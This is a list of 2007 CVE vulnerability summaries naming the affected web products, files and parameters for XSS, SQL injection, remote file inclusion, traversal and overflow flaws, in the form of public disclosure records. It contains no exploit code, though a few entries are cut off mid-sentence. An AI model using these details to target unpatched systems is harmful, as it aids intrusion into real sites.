[CVE-2007-2694] Multiple cross-site scripting (XSS) vulnerabilities in BEA WebLogic Express and WebLogic Server 6.1 through SP7, 7.0 through SP7, 8.1 through SP5, 9.0 GA, and 9.1 GA allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-2689] Check Point Web Intelligence does not properly handle certain full-width and half-width Unicode character encodings, which might allow remote attackers to evade detection of HTTP traffic.
[CVE-2007-2686] Cross-site scripting (XSS) vulnerability in index.php in Jetbox CMS 2.1 allows remote attackers to inject arbitrary web script or HTML via the login parameter in a sendpwd task.
[CVE-2007-2669] Multiple cross-site scripting (XSS) vulnerabilities in PHPChain 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the catid parameter to (1) settings.php or (2) cat.php. NOTE: certain parameter values also trigger path disclosure.
[CVE-2007-2668] Buffer overflow in webdesproxy 0.0.1 allows remote attackers to execute arbitrary code via a long URL, possibly involving the process_connection_request function in webdesproxy.c.
[CVE-2007-2655] Unspecified vulnerability in NetWin Webmail 3.1s-1 in SurgeMail before 3.8i2 has unknown impact and remote attack vectors, possibly a format string vulnerability that allows remote code execution.
[CVE-2007-2638] eFileCabinet 3.3 allows remote attackers to bypass authentication and access restricted portions of the interface via an invalid filecabinetnumber, which can be leveraged to obtain sensitive information or create new data structures.
[CVE-2007-2632] Multiple cross-site scripting (XSS) vulnerabilities in PHP Multi User Randomizer (phpMUR) 2006.09.13 allow remote attackers to inject arbitrary web script or HTML via (1) the edit_plugin parameter to configure_plugin.tpl.php, or (2) certain array parameters to web/phpinfo.php, as demonstrated by 1[] or a[].
[CVE-2007-2627] Cross-site scripting (XSS) vulnerability in sidebar.php in WordPress, when custom 404 pages that call get_sidebar are used, allows remote attackers to inject arbitrary web script or HTML via the query string (PHP_SELF), a different vulnerability than CVE-2007-1622.
[CVE-2007-2625] Cross-site scripting (XSS) vulnerability in shared/code/cp_authorization.php in All In One Control Panel (AIOCP) before 1.3.016 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. NOTE: some of these details are obtained from third party information.
[CVE-2007-2610] Cross-site scripting (XSS) vulnerability in OpenLD before 1.1.9, and 1.1-modified before 1.1-modified3, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the Search feature, possibly the term parameter.
[CVE-2007-2600] Multiple cross-site scripting (XSS) vulnerabilities in TutorialCMS (aka Photoshop Tutorials) 1.00 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) catFile parameter to (a) browseCat.php or (b) browseSubCat.php
[CVE-2007-2592] Multiple cross-site scripting (XSS) vulnerabilities in Nokia Intellisync Mobile Suite 6.4.31.2, 6.6.0.107, and 6.6.2.2, possibly involving Novell Groupwise Mobile Server and Nokia Intellisync Wireless Email Express, allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter to de/pda/dev_logon.asp and (2) multiple unspecified vectors in (a) usrmgr/registerAccount.asp, (b) de/create_account.asp, and other files.
[CVE-2007-2588] Multiple buffer overflows in the Office Viewer OCX ActiveX control (oa.ocx) 3.2 allow remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a long argument to the (1) HttpDownloadFile, (2) Open, (3) OpenWebFile, (4) DoOleCommand, (5) FTPDownloadFile, (6) FTPUploadFile, (7) HttpUploadFile, (8) Save, or (9) SaveWebFile function.
[CVE-2007-2581] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft Windows SharePoint Services 3.0 for Windows Server 2003 and Office SharePoint Server 2007 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (query string) in "every main page," as demonstrated by default.aspx.
[CVE-2007-2579] Multiple cross-site scripting (XSS) vulnerabilities in ACP3 4.0 beta 3 allow remote attackers to inject arbitrary web script or HTML via (1) the form[mail] parameter to contact/contact/index.php
[CVE-2007-2574] Directory traversal vulnerability in index.php in Archangel Weblog 0.90.02 allows remote attackers to read arbitrary files via a .. (dot dot) in the index parameter.
[CVE-2007-2562] Cross-site scripting (XSS) vulnerability in index.php in Kayako eSupport 3.00.90 allows remote attackers to inject arbitrary web script or HTML via the _m parameter.
[CVE-2007-2551] Cross-site scripting (XSS) vulnerability in usersettings.php in WikkaWiki (Wikka Wiki) before 1.1.6.3 allows remote attackers to inject arbitrary web script or HTML via the name parameter.
[CVE-2007-2549] SQL injection vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 allows remote attackers to execute arbitrary SQL commands via the (1) c or (2) quantity parameter.
[CVE-2007-2548] Unspecified vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 has unknown impact and an l remote attack vector, related to "Cookie Manipulation."
[CVE-2007-2547] Cross-site scripting (XSS) vulnerability in index.php in TurnkeyWebTools SunShop Shopping Cart 4.0 allows remote attackers to inject arbitrary web script or HTML via the l parameter.
[CVE-2007-2546] Session fixation vulnerability in Simple Machines Forum (SMF) 1.1.2 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID parameter.
[CVE-2007-2532] Multiple cross-site scripting (XSS) vulnerabilities in Minh Nguyen Duong Obie Website Mini Web Shop 2 allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO (query string) to (1) sendmail.php or (2) order_form.php, different vectors than CVE-2006-6734.
[CVE-2007-2524] Cross-site scripting (XSS) vulnerability in index.pl in Open Ticket Request System (OTRS) 2.0.x allows remote attackers to inject arbitrary web script or HTML via the Subaction parameter in an AgentTicketMailbox Action. NOTE: DEBIAN:DSA-1299 originally used this identifier for an ipsec-tools issue, but the proper identifier for the ipsec-tools issue is CVE-2007-1841.
[CVE-2007-2522] Stack-based buffer overflow in the inoweb Console Server in CA Anti-Virus for the Enterprise r8, Threat Manager r8, Anti-Spyware for the Enterprise r8, and Protection Suites r3 allows remote attackers to execute arbitrary code via a long (1) username or (2) password.
[CVE-2007-2506] WebSpeed 3.x in OpenEdge 10.x in Progress Software Progress 9.1e, and certain other 9.x versions, allows remote attackers to cause a denial of service (infinite loop and daemon hang) via a messenger URL that invokes _edit.r with no additional parameters, as demonstrated by requests for cgiip.exe or wsisa.dll with WService=wsbroker1/_edit.r in the PATH_INFO.
[CVE-2007-2499] Multiple cross-site scripting (XSS) vulnerabilities in DVDdb 0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the movieid parameter to loan.php or (2) the s parameter to listmovies.php.
[CVE-2007-2496] The WordOCX ActiveX control in WordViewer.ocx 3.2.0.5 allows remote attackers to cause a denial of service (Internet Explorer 7 crash) via a long (1) DoOleCommand, (2) FTPDownloadFile, (3) FTPUploadFile, (4) HttpUploadFile, (5) GotoPage, (6) Save, (7) SaveWebFile, (8) HttpDownloadFile, (9) Open, (10) OpenWebFile, (11) SaveAs, or (12) ShowWordStandardDialog property value.
[CVE-2007-2495] Multiple stack-based buffer overflows in the ExcelOCX ActiveX control in ExcelViewer.ocx 3.1.0.6 allow remote attackers to cause a denial of service (Internet Explorer 7 crash) via a long (1) DoOleCommand, (2) FTPDownloadFile, (3) FTPUploadFile, (4) HttpUploadFile, (5) Save, (6) SaveWebFile, (7) HttpDownloadFile, (8) Open, or (9) OpenWebFile property value. NOTE: some of these details are obtained from third party information.
[CVE-2007-2494] Multiple stack-based buffer overflows in the PowerPointOCX ActiveX control in PowerPointViewer.ocx 3.1.0.3 allow remote attackers to cause a denial of service (Internet Explorer 7 crash) via a long (1) DoOleCommand, (2) FTPDownloadFile, (3) FTPUploadFile, (4) HttpUploadFile, (5) Save, (6) SaveWebFile, (7) HttpDownloadFile, (8) Open, or (9) OpenWebFile property value. NOTE: some of these details are obtained from third party information.
[CVE-2007-2474] Multiple PHP remote file inclusion vulnerabilities in Turnkey Web Tools SunShop Shopping Cart 4.0 allow remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter to (1) include/payment/payflow_pro.php, (2) global.php, or (3) libsecure.php, different vectors than CVE-2007-2070.
[CVE-2007-2472] Cross-site scripting (XSS) vulnerability in sendcard.php in Sendcard 3.4.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the form parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-2470] Multiple cross-site scripting (XSS) vulnerabilities in index.php in FileRun 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) page, (2) module, or (3) section parameter.
[CVE-2007-2450] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.
[CVE-2007-2449] Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the '
[CVE-2007-2441] Caucho Resin Professional 3.1.0 and Caucho Resin 3.1.0 and earlier for Windows allows remote attackers to obtain the system path via certain URLs associated with (1) deploying web applications or (2) displaying .xtp files.
[CVE-2007-2440] Directory traversal vulnerability in Caucho Resin Professional 3.1.0 and Caucho Resin 3.1.0 and earlier for Windows allows remote attackers to read certain files via a .. (dot dot) in a URI containing a "\web-inf" sequence.
[CVE-2007-2435] Sun Java Web Start in JDK and JRE 5.0 Update 10 and earlier, and Java Web Start in SDK and JRE 1.4.2_13 and earlier, allows remote attackers to perform unauthorized actions via an application that grants privileges to itself, related to "Incorrect Use of System Classes" and probably related to support for JNLP files.
[CVE-2007-2433] Cross-site scripting (XSS) vulnerability in index.php in Ariadne 2.4.1 allows remote attackers to inject arbitrary web script or HTML via the ARLogin parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-2432] Cross-site scripting (XSS) vulnerability in utilities/search.asp in nukedit 4.9.7b allows remote attackers to inject arbitrary web script or HTML via the terms parameter. NOTE: the provenance of this information is unknown.
[CVE-2007-2431] Dynamic variable evaluation vulnerability in shared/config/tce_config.php in TCExam 4.0.011 and earlier allows remote attackers to conduct cross-site scripting (XSS) and possibly other attacks by modifying critical variables such as $_SERVER, as demonstrated by injecting web script via the _SERVER[SCRIPT_NAME] parameter.
[CVE-2007-2423] Cross-site scripting (XSS) vulnerability in index.php in MoinMoin 1.5.7 allows remote attackers to inject arbitrary web script or HTML via the do parameter in an AttachFile action, a different vulnerability than CVE-2007-0857. NOTE: the provenance of this information is unknown.
[CVE-2007-2421] Buffer overflow in Hitachi Groupmax Mobile Option for Mobile-Phone 07-00 through 07-30, 5 for i-mode 05-11 through 05-23, and 6 for EZweb 06-00 through 06-04 allows remote attackers to execute arbitrary code via unspecified vectors.
[CVE-2007-2419] Multiple buffer overflows in an ActiveX control (boisweb.dll) in Macrovision FLEXnet Connect 6.0 and Update Service 3.x to 5.x allow remote attackers to execute arbitrary code via (1) the second parameter to the DownloadAndExecute method and (2) the third parameter to the AddFileEx method, a different vulnerability than CVE-2007-0328.
[CVE-2007-2415] Pi3Web Web Server 2.0.3 PL1 allows remote attackers to cause a denial of service (application exit) via a long URI. NOTE: this issue was originally reported as a crash, but the vendor states that the impact is a "clean" exit in which "the server I/O loop finishes and the process exits normally."
[CVE-2007-2410] WebCore on Apple Mac OS X 10.3.9 and 10.4.10 retains properties of certain global objects when a new URL is visited in the same window, which allows remote attackers to conduct cross-site scripting (XSS) attacks.
[CVE-2007-2409] Cross-domain vulnerability in WebCore on Apple Mac OS X 10.3.9 and 10.4.10 allows remote attackers to obtain sensitive information via a popup window, which is able to read the current URL of the parent window.
[CVE-2007-2408] WebKit in Apple Safari 3 Beta before Update 3.0.3 does not properly recognize an unchecked "Enable Java" setting, which allows remote attackers to execute Java applets via a crafted web page.
[CVE-2007-2401] CRLF injection vulnerability in WebCore in Apple Mac OS X 10.3.9, 10.4.9 and later, and iPhone before 1.0.1, allows remote attackers to inject arbitrary HTTP headers via LF characters in an XMLHttpRequest request, which are not filtered when serializing headers via the setRequestHeader function. NOTE: this issue can be leveraged for cross-site scripting (XSS) attacks.
[CVE-2007-2399] WebKit in Apple Mac OS X 10.3.9, 10.4.9 and later, and iPhone before 1.0.1 performs an "invalid type conversion", which allows remote attackers to execute arbitrary code via unspecified frame sets that trigger memory corruption.
[CVE-2007-2396] The JDirect support in QuickTime for Java in Apple Quicktime before 7.2 exposes certain dangerous interfaces, which allows remote attackers to execute arbitrary code via crafted Java applets.
[CVE-2007-2391] Cross-site scripting (XSS) vulnerability in Apple Safari Beta 3.0.1 for Windows allows remote attackers to inject arbitrary web script or HTML via a web page that includes a windows.setTimeout function that is activated after the user has moved from the current page.
[CVE-2007-2389] Apple QuickTime for Java 7.1.6 on Mac OS X and Windows does not clear potentially sensitive memory before use, which allows remote attackers to read memory from a web browser via unknown vectors related to Java applets.
[CVE-2007-2388] Apple QuickTime for Java 7.1.6 on Mac OS X and Windows does not properly restrict QTObject subclassing, which allows remote attackers to execute arbitrary code via a web page containing a user-defined class that accesses unsafe functions that can be leveraged to write to arbitrary memory locations.
[CVE-2007-2385] The Yahoo! UI framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking."
[CVE-2007-2384] The Script.aculo.us framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking."
[CVE-2007-2383] The Prototype (prototypejs) framework before 1.5.1 RC3 exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking."
[CVE-2007-2382] The Moo.fx framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking."
[CVE-2007-2381] The MochiKit framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking."
[CVE-2007-2380] The Microsoft Atlas framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking."
[CVE-2007-2379] The jQuery framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking."
[CVE-2007-2378] The Google Web Toolkit (GWT) framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking."
[CVE-2007-2377] The Getahead Direct Web Remoting (DWR) framework 1.1.4 exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking."
[CVE-2007-2376] The Dojo framework exchanges data using JavaScript Object Notation (JSON) without an associated protection scheme, which allows remote attackers to obtain the data via a web page that retrieves the data through a URL in the SRC attribute of a SCRIPT element and captures the data using other JavaScript code, aka "JavaScript Hijacking."
[CVE-2007-2375] The agent remote upgrade interface in Symantec Enterprise Security Manager (ESM) before 20070405 does not verify the authenticity of upgrades, which allows remote attackers to execute arbitrary code via software that implements the agent upgrade protocol.
[CVE-2007-2369] Directory traversal vulnerability in picture.php in WebSPELL 4.01.02 and earlier, when PHP before 4.3.0 is used, allows remote attackers to read arbitrary files via a .. (dot dot) in the id parameter.
[CVE-2007-2368] picture.php in WebSPELL 4.01.02 and earlier allows remote attackers to read arbitrary files via the file parameter.
[CVE-2007-2357] Cross-site scripting (XSS) vulnerability in mods/Core/result.php in SineCms 2.3.4 allows remote attackers to inject arbitrary web script or HTML via the stringa parameter.
[CVE-2007-2354] Progress Webspeed Messenger allows remote attackers to obtain sensitive information via a WService parameter containing "wsbroker1/webutil/about.r", which reveals the operating system and product information.
[CVE-2007-2349] Cross-site scripting (XSS) vulnerability in Invision Power Board (IP.Board) 2.1.x and 2.2.x allows remote attackers to inject arbitrary web script or HTML by uploading crafted images or PDF files.
[CVE-2007-2337] Multiple cross-site scripting (XSS) vulnerabilities in Exponent CMS 0.96.6 Alpha and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) url parameter to (a) magpie_debug.php and (b) magpie_simple.php in external/magpierss/scripts/, the (2) rss_url parameter to (c) magpie_slashbox.php in external/magpierss/scripts/, and the (3) body parameter to the (d) weblogmodule (aka Weblog Comments) module.
[CVE-2007-2336] Unspecified vulnerability in InterVations NaviCOPA Web Server 2.01 20070323 allows remote attackers to cause a denial of service (daemon crash) via crafted HTTP requests, as demonstrated by long requests containing '\A' characters, probably a different issue than CVE-2006-5112 and CVE-2007-1733. NOTE: the provenance of this information is unknown.
[CVE-2007-2335] Cross-site scripting (XSS) vulnerability in the RSS feed reader functionality in Lunascape 4.1.3 build2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2007-2334] Nortel VPN Router (aka Contivity) 1000, 2000, 4000, and 5000 before 5_05.149, 5_05.3xx before 5_05.304, and 6.x before 6_05.140 has two template HTML files lacking certain verification tags, which allows remote attackers to access the administration interface and change the device configuration via certain requests.
[CVE-2007-2310] Cross-site scripting (XSS) vulnerability in plugins/spaw/img_popup.php in BloofoxCMS 0.2.2 allows remote attackers to inject arbitrary web script or HTML via the img_url parameter.
[CVE-2007-2309] Cross-site scripting (XSS) vulnerability in cas.php in FloweRS 2.0 allows remote attackers to inject arbitrary web script or HTML via the den parameter. NOTE: the provenance of this information is unknown
[CVE-2007-2308] Cross-site scripting (XSS) vulnerability in cas.php in FloweRS 2.0 allows remote attackers to inject arbitrary web script or HTML via the rok parameter.
[CVE-2007-2307] PHP remote file inclusion vulnerability in engine/engine.inc.php in WebKalk2 1.9.0 allows remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter.
[CVE-2007-2306] Multiple cross-site scripting (XSS) vulnerabilities in the Virtual War (VWar) 1.5.0 R15 and earlier module for PHP-Nuke, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) memberlist parameter to extra/login.php and the (2) title parameter to extra/today.php.
[CVE-2007-2300] Multiple cross-site scripting (XSS) vulnerabilities in Endy Kristanto Surat kabar / News Management Online (aka phpwebnews) 0.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the m_txt parameter to (1) iklan.php, (2) index.php, or (3) bukutamu.php.
[CVE-2007-2294] The Manager Interface in Asterisk before 1.2.18 and 1.4.x before 1.4.3 allows remote attackers to cause a denial of service (crash) by using MD5 authentication to authenticate a user that does not have a password defined in manager.conf, resulting in a NULL pointer dereference.
[CVE-2007-2290] Multiple PHP remote file inclusion vulnerabilities in B2 Weblog and News Publishing Tool 0.6.1 allow remote attackers to execute arbitrary PHP code via a URL in the b2inc parameter to (1) b2archives.php, (2) b2categories.php, or (3) b2mail.php. NOTE: this may overlap CVE-2002-1466.
[CVE-2007-2277] Session fixation vulnerability in Plogger allows remote attackers to hijack web sessions by setting the PHPSESSID parameter.
[CVE-2007-2272] PHP remote file inclusion vulnerability in docs/front-end-demo/cart2.php in Advanced Webhost Billing System (AWBS) 2.4.0 allows remote attackers to execute arbitrary PHP code via a URL in the workdir parameter.
[CVE-2007-2266] Progress Webspeed Messenger allows remote attackers to read, create, modify, and execute arbitrary files by invoking webutil/_cpyfile.p in the WService parameter to (1) cgiip.exe or (2) wsisa.dll in scripts/, as demonstrated by using the save,editor options to create a new file using the fileName parameter.
[CVE-2007-2265] Cross-site scripting (XSS) vulnerability in YA Book 0.98-alpha allows remote attackers to inject arbitrary web script or HTML via the City field in a sign action in index.php.
[CVE-2007-2256] Cross-site scripting (XSS) vulnerability in you.php in TJSChat 0.95 allows remote attackers to inject arbitrary web script or HTML via the user parameter.
[CVE-2007-2248] Multiple cross-site scripting (XSS) vulnerabilities in admin.php in Phorum before 5.1.22 allow remote attackers to inject arbitrary web script or HTML via the (1) group_id parameter in the groups module or (2) the smiley_id parameter in the smileys modsettings module.
[CVE-2007-2245] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin before 2.10.1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the fieldkey parameter to browse_foreigners.php or (2) certain input to the PMA_sanitize function.
[CVE-2007-2237] Microsoft Windows Graphics Device Interface (GDI+, GdiPlus.dll) allows context-dependent attackers to cause a denial of service (crash) via an ICO file with an InfoHeader containing a Height of zero, which triggers a divide-by-zero error.
[CVE-2007-2235] Multiple cross-site scripting (XSS) vulnerabilities in PunBB 1.2.14 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) Referer HTTP header to misc.php or the (2) category name when deleting a category in admin_categories.php.
[CVE-2007-2207] SQL injection vulnerability in contact/index.php in Ripe Website Manager 0.8.4 and earlier allows remote attackers to execute arbitrary SQL commands via the ripeformpost parameter.
[CVE-2007-2206] Cross-site scripting (XSS) vulnerability in contact/index.php in Ripe Website Manager 0.8.4 and earlier allows remote attackers to inject arbitrary web script or HTML via a leading "<
[CVE-2007-2203] Cross-site scripting (XSS) vulnerability in Big Blue Guestbook allows remote attackers to inject arbitrary web script or HTML via the message field in the guestbook entry submission form.
[CVE-2007-2202] PHP remote file inclusion vulnerability in inc_ACVS/SOAP/Transport.php in Accueil et Conseil en Visites et Sejours Web Services (ACVSWS) PHP5 (ACVSWS_PHP5) 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the CheminInclude parameter.
[CVE-2007-2199] PHP remote file inclusion vulnerability in lib/pcltar.lib.php (aka pcltar.php) in the PclTar module 1.3 and 1.3.1 for Vincent Blavet PhpConcept Library, as used in multiple products including (1) Joomla! 1.5.0 Beta, (2) N/X Web Content Management System (WCMS) 4.5, (3) CJG EXPLORER PRO 3.3, and (4) phpSiteBackup 0.1, allows remote attackers to execute arbitrary PHP code via a URL in the g_pcltar_lib_dir parameter.
[CVE-2007-2198] Cross-site scripting (XSS) vulnerability in LAN Management System (LMS) before 1.6.9 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, probably involving the OD parameter to contrib/formularz_przelewu_wplaty/druk.php.
[CVE-2007-2191] Multiple cross-site scripting (XSS) vulnerabilities in freePBX 2.2.x allow remote attackers to inject arbitrary web script or HTML via the (1) From, (2) To, (3) Call-ID, (4) User-Agent, and unspecified other SIP protocol fields, which are stored in /var/log/asterisk/full and displayed by admin/modules/logfiles/asterisk-full-log.php.
[CVE-2007-2190] PHP remote file inclusion vulnerability in admin/public/webpages.php in Eba News 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the filename parameter.
[CVE-2007-2183] SQL injection vulnerability in index.php in PHP-Ring Webring System (aka uPHP_ring_website) 0.9 allows remote attackers to execute arbitrary SQL commands via the ring parameter.
[CVE-2007-2181] PHP remote file inclusion vulnerability in admin/login.php in Webinsta FM Manager 0.1.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter, a different product and vector than CVE-2005-0748.
[CVE-2007-2177] Stack-based buffer overflow in the Microgaming Download Helper ActiveX control (dlhelper.dll) before 7.2.0.19, and the WebHandler Class control, allows remote attackers to execute arbitrary code via unspecified vectors.
[CVE-2007-2171] Stack-based buffer overflow in the base64_decode function in GWINTER.exe in Novell GroupWise (GW) WebAccess before 7.0 SP2 allows remote attackers to execute arbitrary code via long base64 content in an HTTP Basic Authentication request.
[CVE-2007-2153] Cross-site scripting (XSS) vulnerability in atmail.php in @Mail 5.0 allows remote attackers to inject arbitrary web script or HTML via the username parameter.
[CVE-2007-2119] Cross-site scripting (XSS) vulnerability in boundary_rules.jsp in the Administration Front End for Oracle Enterprise (Ultra) Search, as used in Database Server 9.2.0.8, 10.1.0.5, and 10.2.0.2, and in Application Server 9.0.4.3, 10.1.2.0.2, and 10.1.2.2.0 allows remote attackers to inject arbitrary HTML or web script via the EXPTYPE parameter, aka SES01.
[CVE-2007-2102] Cross-site scripting (XSS) vulnerability in weblog.php in my little weblog allows remote attackers to inject arbitrary web script or HTML via the id parameter, a different vector than CVE-2006-6087.
[CVE-2007-2101] FAC Guestbook 3.01 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/gbdb.mdb. NOTE: the provenance of this information is unknown
[CVE-2007-2100] FAC Guestbook 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/Gdb.mdb.
[CVE-2007-2099] Cross-site scripting (XSS) vulnerability in htdocs/php.php in OpenConcept Back-End CMS 0.4.7 allows remote attackers to inject arbitrary web script or HTML via the page[] parameter.
[CVE-2007-2098] Multiple cross-site scripting (XSS) vulnerabilities in showpic.php in Wabbit PHP Gallery 0.9 allow remote attackers to inject arbitrary web script or HTML via the (1) pic and (2) gal parameters.
[CVE-2007-2090] Cross-site scripting (XSS) vulnerability in index.php in TuMusika Evolution 1.6 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2007-2085] Cross-site scripting (XSS) vulnerability in oe2edit.cgi in oe2edit CMS allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2007-2078] ** DISPUTED ** PHP remote file inclusion vulnerability in index.php in Maian Weblog 3.1 allows remote attackers to execute arbitrary PHP code via a URL in the path_to_folder parameter. NOTE: this issue was disputed by a third party researcher, since the path_to_folder variable is initialized before use.
[CVE-2007-2071] Multiple cross-site scripting (XSS) vulnerabilities in Open-gorotto 2.0a 2006/02/08 edition, 2006/03/19 edition, and 2006/04/07 edition before 20070416 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) pub/modules/d/_top.html
[CVE-2007-2070] Multiple PHP remote file inclusion vulnerabilities in Turnkey Web Tools SunShop Shopping Cart before 3.5.1 allow remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter to (1) index.php or (2) checkout.php.
[CVE-2007-2067] Multiple PHP remote file inclusion vulnerabilities in Marco Antonio Islas Cruz Web Slider (WebSlider) 0.6 allow remote attackers to execute arbitrary PHP code via a URL in the path parameter to (1) index.php, (2) modules/pdf.php, (3) plugins/highlight.php, or (4) include/modules.php.
[CVE-2007-2061] Cross-site scripting (XSS) vulnerability in check_login.asp in AfterLogic MailBee WebMail Pro 3.4 allows remote attackers to inject arbitrary web script or HTML via the username parameter.
[CVE-2007-2048] Directory traversal vulnerability in /console in the Management Console in webMethods Glue 6.5.1 and earlier allows remote attackers to read arbitrary system files via a .. (dot dot) in the resource parameter.
[CVE-2007-2035] Cisco Wireless Control System (WCS) before 4.0.66.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain network organization data via a direct request for files in certain directories, aka Bug ID CSCsg04301.
[CVE-2007-2016] Cross-site scripting (XSS) vulnerability in mysql/phpinfo.php in phpMyAdmin 2.6.1 allows remote attackers to inject arbitrary web script or HTML via the lang[] parameter.
[CVE-2007-2013] Cross-site scripting (XSS) vulnerability in index.php in JEx-Treme Einfacher Passworschutz allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2007-2011] Cross-site scripting (XSS) vulnerability in login.php in DeskPro 2.0.1 allows remote attackers to inject arbitrary web script or HTML via the username parameter.
[CVE-2007-1991] Cross-site scripting (XSS) vulnerability in mail/signup.asp in CmailServer WebMail 5.4.3, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the Comment parameter, a different vector than CVE-2007-1927.
[CVE-2007-1989] Multiple cross-site scripting (XSS) vulnerabilities in DotClear before 1.2.6 allow remote attackers to inject arbitrary web script or HTML via the (1) post_id parameter to ecrire/trackback.php or the (2) tool_url parameter to tools/thememng/index.php. NOTE: some of these details are obtained from third party information.
[CVE-2007-1988] Cross-site scripting (XSS) vulnerability in kernel/filters.inc.php in PHPEcho CMS 2.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2007-1977] Cross-site scripting (XSS) vulnerability in index_cms.php in holaCMS 1.4.10 allows remote attackers to inject arbitrary web script or HTML via the acuparam parameter.
[CVE-2007-1969] Cross-site scripting (XSS) vulnerability in admin/modify.php in Sam Crew MyBlog allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2007-1966] Session fixation vulnerability in eXV2 CMS 2.0.4.3 and earlier allows remote attackers to hijack web sessions by setting the PHPSESSID cookie.
[CVE-2007-1965] Multiple cross-site scripting (XSS) vulnerabilities in eXV2 CMS 2.0.4.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the set_lang parameter to (1) archive.php, (2) article.php, (3) index.php, or (4) topics.php.
[CVE-2007-1957] Multiple PHP remote file inclusion vulnerabilities in Guernion Sylvain Portail Web Php (aka Gsylvain35 Portail Web, PwP) allow remote attackers to execute arbitrary PHP code via a URL in the pageAll parameter to index.php in (1) template/Vert/, or (2) template/Noir/.
[CVE-2007-1953] Session fixation vulnerability in onelook courts on-line allows remote attackers to hijack web sessions by setting a PHPSESSID cookie.
[CVE-2007-1952] Session fixation vulnerability in onelook onebyone CMS allows remote attackers to hijack web sessions by setting a PHPSESSID cookie.
[CVE-2007-1951] Session fixation vulnerability in onelook obo Shop allows remote attackers to hijack web sessions by setting a PHPSESSID cookie.
[CVE-2007-1950] Cross-site scripting (XSS) vulnerability in index_cms.php in WebBlizzard CMS allows remote attackers to inject arbitrary web script or HTML via the Suchzeile parameter.
